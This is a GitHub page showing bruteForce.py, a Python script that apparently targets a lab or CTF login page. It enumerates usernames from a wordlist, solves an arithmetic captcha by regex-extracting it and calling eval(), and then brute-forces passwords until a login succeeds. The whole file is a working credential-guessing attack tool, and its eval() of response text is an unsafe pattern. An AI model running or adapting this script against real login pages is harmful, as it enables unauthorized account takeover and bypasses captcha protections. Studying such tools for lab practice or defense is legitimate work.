-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbruteForce.py
62 lines (39 loc) · 1.53 KB
/
bruteForce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# bruteForce.py Se1y4n
#! /usr/bin/python
from requests import Session
import re
url = "Target_IP/login"
# Removing the line feed (\n) from the usernames and passwords read from the respective files
usernames = open('username.txt','r').read().splitlines()
passwords = open('password.txt', 'r').read().splitlines()
def solve_captcha(response):
captcha_syntax = re.compile(r'(\s\s\d+\s[+*-/]\s\d+)\s\=\s\?')
captcha = captcha_syntax.findall(response)
return eval(' '.join(captcha))
#initializing a session
session = Session()
data = {'username': 'username','password':'password'}
# create a post request to the url with the payload/data using the session opened
response = session.post(url,data=data)
for user in usernames:
response = session.post(url,data=data)
data['username'] = user
if 'Captcha enabled' in response.text:
captcha_result = solve_captcha(response.text)
data['captcha'] = captcha_result
response = session.post(url,data =data)
if 'does not exist' not in response.text:
print(f'Found username: {user}')
print(f"Attempting to brute forcing passowrd for user: {user}")
for password in passwords:
captcha_result = solve_captcha(response.text)
data['password'] = password
data['captcha'] = captcha_result
response = session.post(url,data=data)
if 'Error' not in response.text:
print(f'----> Found Username: {user} Password: {password} ')
exit()
else:
print(f'[*]Trying password: {password} for user ')
else:
print(f'[*] Trying password: password for user: {user}')